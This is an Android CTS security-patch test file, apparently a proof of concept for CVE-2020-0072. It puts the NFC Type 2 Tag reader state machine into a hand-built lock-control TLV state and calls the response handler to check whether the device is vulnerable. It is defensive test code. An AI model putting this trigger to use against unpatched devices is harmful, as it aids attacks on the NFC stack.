unplugged-system/cts/hostsidetests/securitybulletin/securityPatch/CVE-2020-0072/poc.cpp


/*
* Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "../includes/common.h"
#include <log/log.h>
#include <stdlib.h>
#include <nfc_api.h>
#include <rw_int.h>
// Value main() stores into tRW_T2T_CB::bytes_count before invoking the
// response handler.
#define NUM_BYTES 1
// Reader/writer control block, defined outside this file; main() reads and
// writes its fields directly to put the Type 2 Tag state machine in a chosen
// state.
extern tRW_CB rw_cb;
// Functions called by main() and declared by hand here.
// NOTE(review): presumably the included headers do not export these
// prototypes; confirm they match the library's definitions, since a mismatch
// would not be caught at compile time.
void rw_init(void);
void rw_t2t_handle_rsp(uint8_t *p_data);
/**
 * No-op reader/writer event callback.
 *
 * main() registers it through RW_SetActivatedTagType() and stores it in
 * rw_cb.p_cback. Both arguments are ignored.
 *
 * @param event      Event code passed by the caller (unused).
 * @param p_rw_data  Event payload passed by the caller (unused).
 */
void poc_cback(tRW_EVENT event, tRW_DATA *p_rw_data) {
    // Nothing to handle: mark both parameters as intentionally unused so the
    // build stays warning-free.
    (void)p_rw_data;
    (void)event;
}
/**
 * Security-patch check for the NFC Type 2 Tag response path.
 *
 * Registers a no-op callback, places the T2T control block in the
 * "lock-control TLV, waiting for TLV value" detection state, runs
 * rw_t2t_handle_rsp() once, and then compares the lock-TLV slot that was
 * current before the call with the buffered TLV value.
 *
 * @return EXIT_FAILURE    if rw_cb.p_cback does not hold the registered
 *                         callback after RW_SetActivatedTagType();
 *         EXIT_VULNERABLE if lock_tlv[slot].num_bits equals tlv_value[1]
 *                         after the handler ran;
 *         EXIT_SUCCESS    otherwise.
 */
int main() {
    // Activate as ISO-DEP over poll-A and hand the stack our callback.
    tNFC_ACTIVATE_DEVT activation = {};
    activation.protocol = NFC_PROTOCOL_ISO_DEP;
    activation.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
    RW_SetActivatedTagType(&activation, &poc_cback);

    // Sanity check before touching any other field: if the callback is not
    // where this file's view of tRW_CB expects it, the struct layout seen here
    // differs from the library's and later field writes would be meaningless.
    if (rw_cb.p_cback != &poc_cback) {
        ALOGE("Structure tRW_CB mismatch rw_cb.p_cback=%p poc_cback=%p\n",
              rw_cb.p_cback, poc_cback);
        return EXIT_FAILURE;
    }

    tRW_T2T_CB *t2t = &rw_cb.tcb.t2t;

    // Re-initialise the reader/writer module, then restore the callback.
    // NOTE(review): presumably rw_init() resets rw_cb, which is why p_cback is
    // assigned again; confirm against the library.
    rw_init();
    rw_cb.p_cback = &poc_cback;

    // Hand-built state: detecting TLVs, a lock-control TLV has been found and
    // NUM_BYTES byte(s) of its value are still expected.
    t2t->state = RW_T2T_STATE_DETECT_TLV;
    t2t->tlv_detect = TAG_LOCK_CTRL_TLV;
    t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE;
    t2t->found_tlv = TAG_LOCK_CTRL_TLV;
    t2t->bytes_count = NUM_BYTES;
    t2t->tlv_value[1] = 0;

    // Remember which lock_tlv slot is current before the handler runs, since
    // the handler may advance num_lock_tlvs.
    int lock_slot = t2t->num_lock_tlvs;

    // NOTE(review): this buffer is passed to the handler without being
    // initialised, so any bytes the handler reads from it are indeterminate.
    // Confirm that the verdict below does not depend on their values.
    uint8_t response[T2T_READ_DATA_LEN];
    rw_t2t_handle_rsp(response);

    // NOTE(review): tlv_value[1] was set to 0 above, so unless the handler
    // changes it, this treats num_bits == 0 in the recorded slot as the
    // vulnerable outcome. Confirm against the patched handler's behaviour.
    if (t2t->lock_tlv[lock_slot].num_bits == t2t->tlv_value[1]) {
        return EXIT_VULNERABLE;
    }
    return EXIT_SUCCESS;
}